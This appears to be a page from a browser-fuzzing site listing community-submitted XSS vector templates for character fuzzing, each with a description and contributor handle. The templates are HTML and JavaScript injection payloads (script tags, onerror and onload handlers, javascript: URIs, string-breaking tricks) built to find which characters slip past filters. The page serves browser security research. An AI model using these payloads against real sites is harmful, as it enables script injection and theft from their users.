Featured vector

No vectors found in the last 30 days

Fuzz vector cloud

5,457,343 Successful fuzzes

Fuzz Vectors

Searching for "char"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Possibility of XSS via lead bytes <html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="*chr*"></p> <p><input size=20 value="<script>logChr(*num*)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html> @irsdl
replacement *chr*img src=xx:xx onerror=logChr(*num*)> @matttiko
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
Separators <svg*chr*onload=logChr(*num*)> @JohnathanKuskos
charecter between two URI <a href="http://*chr*javascript:alert(1)">testxss</a> @Mramydnei
Characters allowed before script tag name <*chr*script> logChr(*num*) </script> @tifkin_
allowed char in js comment <script>logChr(*num*)<*chr*!-- '</script> @insertScript
img onload with only one char in src <img src=*chr* onload=logChr(*num*)> @insertScript
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
chars allowed after colon v2 htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed in colon v2 htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){}; @heyheyheyhey10
chars allowed after colon htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){}; @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
char for fireing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
Char that allows you to act as a slash in closing tag 2 <script>log(*num*)<*chr*script></script> @notxssninja
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F